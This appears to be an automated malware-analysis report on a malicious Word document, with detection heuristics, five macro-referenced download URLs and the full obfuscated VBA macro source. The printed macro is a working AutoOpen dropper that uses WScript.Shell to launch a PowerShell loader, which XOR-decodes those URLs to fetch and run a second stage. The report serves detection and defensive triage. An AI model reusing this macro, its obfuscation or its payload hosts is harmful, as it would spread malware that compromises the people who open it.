MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro utilizes `CreateObject("Wscript.shell")` and `Shell()` calls, indicating an intent to execute arbitrary commands or download and run a second-stage payload. The presence of the `AutoOpen` macro further suggests an automated execution upon opening the document.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6598952-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6598952-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
SoNVo = (ELVitX - 8634 / 20826 / 23663 * (qrlNK + PPOjCp)) jojIcaSJc = KdIjj + CreateObject("Wscript.shell").Run(bdnAC + Chr(vbKeyP) + mjwjwBi + Chr(vbKeyO) + NGwCnd + FDCRclnlqZ, 328923811 - 328923811) GstLs = (uzhBEP - 42032 / 62219 / 20369 * (BLPCRA + dcvrYw)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
SoNVo = (ELVitX - 8634 / 20826 / 23663 * (qrlNK + PPOjCp)) jojIcaSJc = KdIjj + CreateObject("Wscript.shell").Run(bdnAC + Chr(vbKeyP) + mjwjwBi + Chr(vbKeyO) + NGwCnd + FDCRclnlqZ, 328923811 - 328923811) GstLs = (uzhBEP - 42032 / 62219 / 20369 * (BLPCRA + dcvrYw)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "aiMWwND" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://clubvolvoitalia.it/r3z6/ Referenced by macro
- http://ericconsulting.com/7I3eUNF/Referenced by macro
- http://www.goldenfell.ru/media/5DzF30jL/Referenced by macro
- http://jmamusical.jp/wordpress/wp-content/L8J0igh/Referenced by macro
- http://www.mobsterljud.se/VJkuLg/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15982 bytes |
SHA-256: 74f34035d7b3a10b92dec2ed93d5606dc630b5914d23f8a5083220ac163690a9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
333 of 502 identifiers look randomly generated (e.g. 'DVTiwDGdatR') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "YkHoDhZsj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aiMWwND"
Sub AutoOpen()
On Error Resume Next
plNiw = (zQNpN - 98044 / 71714 / 96082 * (DYdFC + iCcLwq))
NGwvHR = (bjYVXn - 11498 / 49009 / 30623 * (BttFw + jjHTKj))
TzjNCH = (RrUWqT - 185 / 15007 / 64912 * (hFmNJ + wfRdP))
zzRsz = (VoZDS - 46859 / 93993 / 18061 * (WPccb + slEwWJ))
mikdcD = (WEzUvl - 87861 / 78571 / 57477 * (NQAdZP + BnPGLN))
cuZBrS = (vtQCSR - 15804 / 62700 / 79309 * (EIRiF + SNSvc))
VvnLUwcj (qRKoQIIoJR + TucEpw + VFzuQBsW + IzljlBFPu)
nlKrCs = (MszLz - 34640 / 44852 / 68487 * (HwjUwK + DvMWl))
oYWLH = (fsbPQ - 60744 / 55031 / 24695 * (wSQiZ + FUOHpd))
GvpVPF = (ZpnKR - 8542 / 66135 / 61052 * (QpWzwH + woMPiD))
End Sub
Function VvnLUwcj(NGwCnd)
On Error Resume Next
ERcwm = (auQWIh - 14360 / 59650 / 11985 * (VJZmw + TjmzR))
hDqWVh = (tpIwzI - 42352 / 47981 / 98346 * (OzwpXr + IRJlz))
JmOjNM = (mMavNb - 24423 / 24548 / 51059 * (ctUrXz + DJMjN))
Xzvtz = (kbIMS - 5148 / 4935 / 49742 * (cvith + hrdEln))
dDAwYJ = (wRiND - 80703 / 4662 / 37918 * (CoVZPa + iqfPq))
SoNVo = (ELVitX - 8634 / 20826 / 23663 * (qrlNK + PPOjCp))
jojIcaSJc = KdIjj + CreateObject("Wscript.shell").Run(bdnAC + Chr(vbKeyP) + mjwjwBi + Chr(vbKeyO) + NGwCnd + FDCRclnlqZ, 328923811 - 328923811)
GstLs = (uzhBEP - 42032 / 62219 / 20369 * (BLPCRA + dcvrYw))
IvPtP = (zMMLRR - 16925 / 81413 / 63588 * (ouFnMU + mBGEQi))
HVBZtJ = (cQYcpz - 8898 / 70107 / 248 * (zwiHzT + vnIcs))
End Function
Function qRKoQIIoJR()
On Error Resume Next
Ywcdzz = HDlICu * orMOaR + vKBlNp + 44474 + 73414 - cTsBtG + XKXvW / NswRIt * 67472 / LvBGd
arjIYV = JoJsw * ioDCWD + zJpvhi + 5949 + 42171 - YruQT + faOWBi / DmYJL * 9367 / HsiDhq
CnbuS = sPRzhO * IdozBN + GCWXSw + 88141 + 18627 - NrjcVd + nbinLo / acwNT * 57475 / iBTzK
rUzmrZtZc = "wershel" + "l " + " " + " " + " " + "& " + Chr(40) + Chr(40) + "vA" + "rIaB" + "LE '*MD" + "R*'" + Chr(41) + ".nAm" + "E[3,11" + ",2]-JOIn" + "''" + Chr(41) + " " + Chr(40) + Chr(40) + "["
QEbUBi = EGzmVi * BXTahR + wuWkaf + 55418 + 66109 - QfLiVj + OmcFQ / iJron * 5351 / htPsS
JEjaC = WQhHK * VRXFn + MQbPN + 87201 + 72633 - abIXPS + AZviL / wuEzC * 63978 / RkjcFK
Bttrqo = juHKr * oUscab + OVXSKM + 95934 + 51642 - sfRFmJ + fDoWP / AwmLp * 98103 / sGBdiR
pQDzn = "CHaR[" + "]] " + Chr(40) + "60, 105,8" + "0 , 126 " + ", 37 ,1" + "18,12"
Wahirj = CbslEi * MZmEQ + VajzWw + 56598 + 94254 - iobVdl + WKfjb / UtZkUk * 60398 / OYOWKv
hHsFtQ = EKjBbH * cZkTX + mZlit + 33863 + 9263 - PMzTp + oCnah / XpPBTI * 45197 / mziCmp
IVNMc = hozkh * zOZlJm + jwJkLk + 88665 + 51888 - QhzjAB + jaNFVp / RRlWZ * 29058 / OUPwG
QHlzY = "5 , 1" + "11, 53,11" + "9 , " + "122, 114 " + ",125, 123" + ", 108, " + "56,86 ,12" + "5 ,108," + " 54," + " 79,12"
wlBci = EYPnBl * isLwjV + wrTaNU + 22836 + 31858 - Nhkuq + vYkXkk / Cdklij * 38080 / XibMP
RbOOY = WCFQrF * zmMJk + Uppqc + 80544 + 60462 - zpwJha + dwVJL / FzYTtZ * 59578 / QLZqD
RclmYt = XNHHKi * TpqAYM + qRXiQ + 890 + 50805 - dZSifI + LikSF / lQLjuD * 4537 / UYSqjb
PSdsjR = "5, 122," + " 91 , " + "116 ," + "113 ," + " 125,1" + "18 , " + "108 ," + "35 ,60," + " 113" + ",77,7" + "8, 37, "
NDHsQ = jipfwT * iHPGH + EBLzVw + 46274 + 16985 - AAowj + zfdZou / hWEwk * 67991 / MIMiAX
CElws = aiorzm * jcmjTm + TpvZM + 78283 + 24146 - roFwJj + ardvPc / hMwzGP * 69967 / fPOVq
JLjES = qAlBdw * BuDXWZ + HidOi + 93467 + 22676 - Iqjnp + Rfurwz / havUJ * 59971 / bcrrwW
kmHrQpDQ = "63 ,112," + "108, 1" + "08, 104," + "34 , 55,5" + "5 ,123" + " , 116" + " , 1" + "09 ,122" + " , 110 ," + "119 , 116" + ", 110" + ",119,11"
aiUVW = UsvRp * BkOJj + bKaHht + 47536 + 33503 - tfwsrT + qwZVaf / pfdfCd * 96975 / TKQUL
SBazEp = MwZznX * RjKAwV + cEOVoi + 61976 + 23472 - bXHAYv + YVpOci / hPFFw * 68996 / QXqsq
MbQKuA = wafXV * lmiGH + tAjGi + 49163 + 69573 - nKARHi + lzFfTc / GHjhka * 97150 / mQijw
lKdinwPkiw = "3,108 ,12" + "1,116 ,1" + "13,121" + " , 54" + ",113, 10" + "8, 55" + " , 106"
fUhlKX = naOQm * zoZbo + TuZWAp + 18515 + 57325 - YjiYl + GcXuI / FShVR * 94704 / zZMpu
cCGzh = AtuPqf * ATtLCh + bObrBj + 84960 + 10101 - ALuoVJ + AiqwI / KDqqZ * 92885 / FNKIOc
aOwzD = PuDwqW * SthLiX + EXBLJ + 92075 + 38585 - nBlZs + alisvM / QAuzDE * 36177 / jwZrM
fKJdjZYSiV = ",43,9" + "8 , 46 " + ", 55 " + ", 88, 1" + "12,1" + "08,108" + " ,10"
CNloH = qGCKRd * sHwTnK + nXGLG + 82713 + 2415 - HCLhj + XYwEnl / JwjhZ * 17186 / Fhfmhs
fGZiQ = izzwjz * VjCPz + OiZWd + 63760 + 65533 - GZXYAo + rRWVX / bJwlw * 53097 / FWiQnH
rGjwAi = XZcZiJ * dRftcO + VblfFj + 40816 + 69839 - GlsKXl + aVoLDj / LPSDc * 9658 / WLsqWf
IzRij = "4, 34 ," + "55 , " + "55,1" + "25 , 106" + " ,113," + "123, 12"
qRKoQIIoJR = rUzmrZtZc + pQDzn + QHlzY + PSdsjR + kmHrQpDQ + lKdinwPkiw + fKJdjZYSiV + IzRij
Qvwini = oqzXr * FYnDkl + aQnjt + 60188 + 92575 - ZzTBGk + ZpjPF / WZSjkV * 87395 / YpGlZX
ISlIi = OqfVlw * wzWUjG + qUAIJ + 5186 + 72484 - KNQhM + RXvHW / IjnKz * 44637 / zaSlFT
JnScw = zMfSFD * mhaaNJ + uHhpJm + 9264 + 72805 - rbKOsz + ESIqNv / UEvlL * 35921 / sXvaZ
End Function
Function TucEpw()
On Error Resume Next
KJPzDN = 83028 / ZCsJf - (82326 - JPbVa - MuwBpk + KndNa - 20449 / 77035 + VtfTN * Bnlvns)
GcTMb = mnrup * mDVHFT + zDNlNA + 86808 + 36890 - zDPnTz + bzvPz / PdJGs * 48120 / ikScv
wtrGM = uLonfB * pftIK + iqojc + 13069 + 16439 - DvPlm + uwiksj / EzbpdE * 36493 / jlbIYQ
mfWjUM = "3 ,11" + "9 , 118" + ",107 ," + " 109,1" + "16, 1" + "08, 113 ," + "118 ,12" + "7 ,54" + " , 123,11" + "9 , "
EEDGm = 73482 / SdbGN - (16049 - HzsRww - jCiXSJ + OJdhWX - 13266 / 33478 + oFUjPY * nYBVw)
cLhCqr = 95766 / QzNdX - (11371 - YiiUCj - WvCMKK + NGBrl - 65705 / 53565 + KkTqFE * RqqbQO)
MTqCo = 79091 / AijmID - (82792 - llXJc - wBMai + dLWjur - 13844 / 89213 + BjtmKK * mDwBE)
jltZCpah = "117, 5" + "5, 47," + "81 ,4" + "3 , 125," + "77 ,86" + " ,94,5"
hKRFdr = 62239 / HuvnL - (3684 - GUEmo - fVwEFU + piqiS - 40840 / 50035 + KLVKF * jjCjWa)
LfFHbV = 5446 / jTcUE - (39147 - YrkiqS - LbPNL + qwQouY - 96454 / 96374 + PwlOFF * sLLDKO)
RnIXGU = 57699 / NJIikD - (77038 - fWzwco - bMzZiD + HjcQw - 2164 / 73344 + rdzXi * FWUiEl)
SAOAmsD = "5 ,8" + "8,112,108" + ",108,10" + "4,34 " + ",55,55,1" + "11 ,111 ," + "111,54, 1" + "27, 11" + "9,116 , " + "124, 12"
ZZIoh = 28334 / tRRrJ - (97973 - wRvLXn - OrJZjr + nihTd - 60805 / 26570 + hSdttB * nwHZhE)
QziRwC = 5090 / SAYWKV - (55851 - RVqbz - Jjcinv + wVitoZ - 59764 / 24123 + WSXks * znvVG)
lNjwhU = 82051 / oNPGCW - (59656 - dVwzrE - YEPDwl + nRpGKH - 3687 / 91402 + EoRYI * QhVfH)
bqWDwpjQi = "5, 118," + "126 , " + "125 , 116" + " ,116, 54" + ", 106 " + ", 10"
hGliS = 86926 / GpKEO - (68179 - UmMVc - FtaCsz + flJvM - 7338 / 32123 + CBFzG * jLdNKE)
lJIUcL = 64355 / OBXmFj - (67482 - fTMFj - iiufYE + SGJRo - 92981 / 46250 + JDCLi * bVHvG)
YcFVz = 30043 / bdZwn - (55891 - wuOVRn - MVQKu + YGInj - 35049 / 312 + qBnSYn * hjGOiz)
HzcZVaPORU = "9,55, 1" + "17 ,125" + ",124, " + "113,1" + "21, 5" + "5, 45,92 " + ", 98" + " , 94 ,4" + "3 ,40,11" + "4, 84" + " , 55," + "88 ,112"
OIjki = 32182 / jshUw - (85340 - ipLYFz - WOloD + iOkWiJ - 89252 / 50425 + JlYkil * bmbkjv)
MzttFA = 4477 / jimTif - (39968 - PsKSvS - HVVTWh + phvmSo - 31543 / 4127 + DOkVS * jczOf)
Uzlft = 22248 / XjjjGi - (87666 - YsNjP - lHELw + optVH - 3092 / 68364 + iJGYd * iXWidn)
lQWtcJBKwHu = ", 108,108" + ", 104" + " , 34 , " + "55 ,55 " + ",114 , 1" + "17 ," + " 121" + " , 11" + "7 ,10" + "9 , 1" + "07, 113,1" + "23 , "
TucEpw = mfWjUM + jltZCpah + SAOAmsD + bqWDwpjQi + HzcZVaPORU + lQWtcJBKwHu
bARXXj = 38965 / jADoXo - (29596 - wMjhjM - wWTUTj + fZmNw - 94125 / 9493 + AwaRtm * SauGvP)
LJYnzs = 87724 / wffSVH - (21823 - nzXCfZ - UQnfmz + SEnfZ - 23518 / 19179 + uhmLp * FQQiQz)
mJsClK = 6896 / LMGwj - (24756 - ipizcR - pPTkG + zXzWA - 45340 / 61357 + udnCGw * VjNFjd)
End Function
Function VFzuQBsW()
On Error Resume Next
fjRES = 83945 / VARMH - (79217 - EsJjQM - nbsJXZ + jOiKuf - 41070 / 16135 + iJjMB * pzulpr)
zvCOEU = 1928 / OAucV - (57304 - JsSfV - kHSSI + DsaNnr - 75360 / 50640 + Lhskbw * ZXRRUQ)
CnQtj = 28937 / kwvWzL - (78511 - HlhDLw - autPD + vBrdnb - 46120 / 50416 + zGLBa * wOilsn)
NWcqGNHv = "121 , 1" + "16 ," + " 54,114" + " ,104 ," + "55 , 1" + "11, " + "119, 1" + "06 ," + " 124, 10" + "4,106," + " 125,107," + "107, 55,"
hhTsim = 32658 / AzGOV - (11811 - Vmkwz - GJtHb + HUQli - 10981 / 80591 + pMqQvt * pXsnW)
VBbaf = 84085 / ZuuSj - (78827 - mBNKav - bakzjq + sPmkmK - 87302 / 55689 + TzdAnn * OdMLC)
jbPwpu = 51362 / bwBVjf - (16085 - wisJTu - wvsnL + VXfjv - 66673 / 20465 + qUzCr * DciHIG)
ZKXGnr = "111 ,1" + "04 ," + " 53," + " 123 " + ", 119,118" + ",108 , 1" + "25 ,118" + ",108 , " + "55 ,84," + "32 ,82"
oRsCS = 90797 / HSiPd - (47927 - zWkCw - pbiVz + hkATv - 767 / 73452 + BnwRn * McWji)
iGrWLI = 37561 / YakCkJ - (97133 - LbJfRj - vTAEK + mAUFR - 55186 / 25669 + OTzWN * lFOLj)
FLQir = 37561 / wwCLEJ - (18656 - ZQwShl - wILIE + XqFpU - 12124 / 21396 + jpOzhQ * MHsNDf)
hCzUPUATDQ = " ,40 ," + "113 , 1" + "27 , 112 " + ",55 " + ",88, 112" + ", 108 , " + "108 ,104" + ",34," + " 55, 55 "
iVoHUz = 49916 / iszmFA - (98578 - kUqEQ - ZRWWKs + SKvctn - 69531 / 23276 + GjqPzP * ztsRr)
rWPlI = 19704 / UWNjX - (5987 - NdGzmO - NEJZTP + zNEBmw - 55831 / 20528 + OKlvS * nDZOpC)
VXtTMi = 34524 / MpuWV - (17712 - ikGVC - roBTZ + RFAEa - 62224 / 32301 + jITkws * CVqYw)
wjFjL = ", 111" + " , 111," + " 111" + " , 54, " + "117 ," + "119, " + "122, 1" + "07 ,10"
BlzpX = 26160 / EbjYBH - (51068 - aKqZZl - izLCVP + YvXSz - 5234 / 79566 + lLYvhz * Kfhifo)
VisOBv = 44841 / zphoQh - (8620 - MMPzm - JNBiK + ZcRawh - 78490 / 25422 + ilooNI * IbhiOn)
fBrwHY = 59874 / WlZKU - (44882 - pisrZ - aaKZGR + awbil - 91265 / 73699 + GjhoE * OCPCn)
znNva = "8,125 ," + "106, 116" + ",114 ," + " 109 ,124" + " , 54 ," + " 107 "
YbASa = 33801 / fDCHR - (34073 - ZiPARz - KjqJP + QuHwrG - 90595 / 32170 + fQYSdf * bKCPE)
YdNjTC = 575 / UsksCl - (3446 - KXwcYf - dDkIo + VqkXjX - 88401 / 8923 + inwHq * LovpIw)
GiLUs = 54425 / jjtLwz - (3404 - VWNHiw - JfQpVS + pTjiw - 69757 / 3652 + LiRUh * tlIqdL)
EfEiXqLXIal = ",125,55,7" + "8, 8" + "2 , 115" + ", 109,84," + "127, 55 ," + " 63,54" + " ,75 ,1" + "04, 116" + ",113 ," + "108,48,6"
AzIvi = 53008 / YIAFd - (5123 - FtsUAu - GiCRMC + UbiQn - 71692 / 28416 + rqLIb * zIDCRv)
GtqMO = 17026 / sKILc - (16385 - vEPLWd - zzcwUf + HfGzk - 92766 / 76201 + IismD * VHMqU)
MXurtb = 74456 / tONtd - (21031 - iBMrMw - vlSkaj + rPIzlq - 69172 / 70912 + FJJjU * RwIsPq)
TtSXLqBGjX = "3, 88" + ", 63, 4" + "9 ,3" + "5,60, 10" + "5 , 7" + "2,114 " + ",56, 37"
wVQDwu = 66268 / NAvKmZ - (96001 - wNrIV - cWodZ + JlFjE - 71333 / 82738 + sdNzAK * tAjZXw)
FQXPw = 37522 / RFdSZp - (8890 - SpqRkw - BJsSw + ZzPuG - 15836 / 28919 + KBrRU * lMtill)
qOMAK = 28891 / OOXdX - (71367 - GOXShp - HnzzP + QpQJh - 19430 / 86902 + kDuwtM * wiNujA)
OmZpkHYwk = ", 56 ," + " 63,46 " + ", 45 ,6" + "3,35,60" + ",117 " + ", 124," + "114 , " + "37 ,60 , " + "125, 118,"
SWHaL = 73008 / KsZucj - (10842 - NYoikH - ZmfjOz + KvAZDL - 91819 / 97156 + XpjBY * aOGXw)
RjrrJ = 76505 / tPSUXQ - (53001 - OFBiDU - zsHLU + VFDBMt - 38434 / 47053 + NbDBzO * idtOzm)
Ypvvzh = 97328 / wTJYKP - (37048 - XHXar - iCVEE + iRFlj - 52775 / 59549 + RwUrq * cjraDf)
HUiYkTVMH = "110 , " + "34 , " + "108,125,1" + "17 , 104" + " , 51" + ", 63, 6" + "8,63, 51 "
zaQntU = 47976 / GwARd - (52882 - bYvUKZ - fLkid + PNZquZ - 59533 / 58782 + SJsQw * qCVYEJ)
TlVuD = 49997 / UvcXBP - (66190 - uDjukP - RtEFU + MRdqBY - 83439 / 18151 + izlwiP * Rilqvf)
adLGF = 39070 / qzFzId - (97423 - AqrUPY - JmlwWb + UiEjF - 6763 / 24755 + RmpDnC * BWlwki)
CYCtwwhF = ",60, 1" + "05 , 72 ," + "114," + "51 ," + "63, 54 , " + "125, 96," + "125,63 ," + "35,12"
VFzuQBsW = NWcqGNHv + ZKXGnr + hCzUPUATDQ + wjFjL + znNva + EfEiXqLXIal + TtSXLqBGjX + OmZpkHYwk + HUiYkTVMH + CYCtwwhF
cklPD = 89104 / KCVvR - (67008 - ZOJEk - jXZwhA + svvnzA - 71923 / 26176 + oBkrE * NOWNC)
MBQTVu = 90131 / CPqoG - (86611 - JWDwN - Glbtd + oIOFZ - 52532 / 39365 + YaaEk * LQuCcp)
StzUHv = 67782 / QoasV - (12189 - nJQMms - iwzMd + qrZRn - 72581 / 42619 + PkSfl * HmAMOd)
End Function
Function IzljlBFPu()
On Error Resume Next
pEiVPw = 4207 / tmKjuX - (91011 - pMTqW - rKjWQ + KwPzja - 68536 / 69399 + bloCA * kjNwC)
iXrHit = 66211 / KmiCv - (48535 - HiwRz - SaHUs + cKKbTw - 40758 / 18589 + DfSHC * vBTiv)
pFjYwE = 51822 / zjmmN - (12204 - ALODaP - DCfJuu + ZomwA - 74465 / 9198 + DXtusa * sjuwN)
DVTiwDGdatR = "6 , 119," + "106 ," + " 125 " + ",121 ," + " 123 ,1" + "12 , " + "48, 60 ," + "126 " + ",98 " + ", 112"
nbfaa = 59212 / McZuB - (44569 - jPzOoS - UKjKLU + UTYKN - 21330 / 69573 + IJSZjh * XXbFw)
srhdX = 48393 / NUpshS - (37376 - WMzToL - NbfnVw + aSYNK - 34213 / 13493 + UJBBWn * sHjhOO)
NiONz = 56899 / zjDjG - (87179 - UTIBn - rpSmoE + iXDoks - 8345 / 8653 + zzSdcW * wSQuO)
EizmdE = " , 56,113" + ", 118" + ", 56" + ",60 , 1" + "13,77 , " + "78, 49 " + ", 99 " + ", 10" + "8 ,1" + "06,97,99 " + ", 60 " + ",105,80"
wimhD = 84026 / Pvhzh - (64039 - qzzlN - muUFz + ORSmdK - 33833 / 71895 + VaYjYS * SkiboD)
iTBFww = 37119 / wQOJH - (85635 - BkoMp - GpwPl + zmMiGY - 42632 / 71838 + WEQOQL * tDPYo)
WmntG = 80733 / iFqKDV - (57131 - hHllHJ - fXzZsu + szNFkQ - 49405 / 90743 + RjJVQ * FLvhc)
wowSQzNl = ",126 ,54" + ",92, 11" + "9 ,111 " + ",118 ,11" + "6 , 119," + "121, 124" + ",94,1" + "13 ,1" + "16, 125," + " 48 ,60" + " , 126, " + "98 , 1"
bAifub = 94152 / uIPuH - (4810 - lNtIW - CHrIPz + ktpCX - 91300 / 19556 + PidqGa * wKtQj)
INJUS = 47855 / KhjPc - (80398 - IDmQvQ - XZFpr + bjWWA - 22613 / 85540 + ZUqzM * LtoQvd)
KjwLsm = 7542 / nEfbSa - (50183 - NPRzn - jvRjWJ + lotOYR - 6971 / 51283 + HZoYl * LXuUl)
UjaPCd = "12,52 , 5" + "6, 60,117" + " , 12" + "4,114,49," + "35 , " + "75 , 108" + ",121 ,10" + "6 , " + "108 , 53," + "72,106" + " , 11"
LWDQw = 35522 / wAZHp - (69994 - JNQpMq - FVPns + wQabF - 14332 / 12145 + XPCHU * bdLlDm)
aKAMP = 97351 / smWfd - (56777 - BTNXL - bWiQRP + mJhPw - 27035 / 36258 + iopIw * vcLzMd)
OfwWE = 82417 / Djjuz - (79187 - jFHhPK - SfXOP + fuTSE - 74364 / 98004 + dkstX * GCEvJH)
DTnwoAkuw = "9,123" + ", 125, 1" + "07 ,107 " + ",56," + "60,117" + ", 124 , 1" + "14 , 35 " + ", 122 ,1" + "06,125, 1" + "21, 115 ," + "35, " + "101,12"
EijsPm = 81008 / wQzUlt - (59565 - JFwQf - uPTbd + XpZkGH - 48645 / 82541 + zIIEk * ZsPaEZ)
zpoFw = 33585 / FBocEB - (11261 - ZzBiiZ - zOhswm + JdjFQB - 53230 / 73017 + IpUOW * ZDSowD)
jVIbM = 83560 / YEVzd - (84208 - twkED - btsJKO + oiZHq - 46388 / 91518 + OzppkM * EUUliQ)
EwWtzlqjMHf = "3 ,121 ," + " 108 ,123" + " , 112 ," + "99,101 " + ",101 " + Chr(41) + "| %" + " {[CHaR]"
qIjUr = 50023 / AiNEGf - (85119 - iFRiuH - DlDqXd + jivZr - 47574 / 13099 + XLiEi * PGAmG)
LfiAB = 6737 / UZnJBF - (18879 - MOdUop - znLuD + XEBZP - 32258 / 56740 + BGGVCD * UzDfo)
fAzjlR = 478 / uoHASz - (40214 - klojzK - Xwlmm + oIPOnr - 6890 / 8278 + izdLHR * VkFDhO)
YEjjzFuRUd = " " + Chr(40) + " $_ -b" + "xor 0x" + "18 " + Chr(41) + "}" + Chr(41) + "-jOin " + "''" + Chr(41) + ""
IzljlBFPu = DVTiwDGdatR + EizmdE + wowSQzNl + UjaPCd + DTnwoAkuw + EwWtzlqjMHf + YEjjzFuRUd
GBksqr = 55556 / rmTlj - (69251 - ldpHb - CTLzHF + hjjkJW - 81686 / 2511 + rPmKGX * hpQGVB)
FAmzTK = 2095 / zQACH - (98207 - fJjoTi - hFEpdU + iDERtv - 62994 / 92560 + FhXBGH * czfXk)
TwnFiS = 63368 / ihjRTN - (92811 - ODQiMb - vcUau + szwChj - 12630 / 57401 + QOPBbz * kntOri)
End Function
Attribute VB_Name = "hidPDwPj"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.